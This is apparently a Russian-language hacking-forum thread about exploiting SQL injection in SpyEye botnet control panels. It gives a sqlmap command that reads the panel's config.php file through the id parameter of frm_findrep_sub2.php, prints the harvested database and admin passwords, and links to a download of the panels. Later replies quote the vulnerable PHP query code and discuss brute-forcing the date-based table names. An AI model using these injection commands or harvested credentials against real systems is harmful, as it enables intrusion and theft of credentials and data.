Spyeye SQLI

[quantum]

Privet.

./sqlmap.py -u"http://x.x.x.x/formgrab/frm_findrep_sub2.php?id=1" --file-read=/var/www/formgrab/config.php

proverka:


cat output/76.73.17.90/files/_var_www_s3_fr3
<?php
# Database
define('DB_SERVER', 'localhost');
define('DB_NAME', 'fra');
define('DB_USER', 'root');
define('DB_PASSWORD', '1234TTab123xsdesd568');

# Admin
define('ADMIN_PASSWORD', 'hdjsd898oiSDKfsdf32423ncc');
?>


Panels
http://www.2shared.com/file/YsEUXbjC/ztar.html

 

[Mail2k]

А где сам сплойт то?

 

[DASM32]

А где сам сплойт то?

На нас оставили

Попробовал я sqlmap-ом с такими параметрами - молчит, собака (версия последняя - 0.9).

Если поглядеть содержимое frm_findrep_sub2.php, то видно там следующее:

$id = $_GET['id'];
$dt = $_GET['dt'];

require_once 'mod_file.php';
require_once 'mod_dbase.php';
require_once 'mod_strenc.php';

$dbase = db_open();

$sql = "SELECT `bot_guid`, `date_rep`, `process_name`, `hooked_func`, `func_data`, `keys`, `url` FROM rep2_$dt WHERE id = $id LIMIT 1";
$res = mysqli_query($dbase, $sql);
if (!(@($res))) {
	writelog("error.log", "Wrong query : \" $sql \"");
	echo "<b>Wrong query</b> : \" $sql \"";
	db_close($dbase);
	exit;
}

if ( mysqli_num_rows($res) == 0) {
	echo "<b>Not found</b>";
	db_close($dbase);
	exit;
}

Я так чувствую сначала подбирать даты к "rep2_$dt", или есть лучше вариант (там есть такой фрагмент - "$today = gmdate('Ymd')", да и судя по логам дата в названии таблицы именно в таком формате)?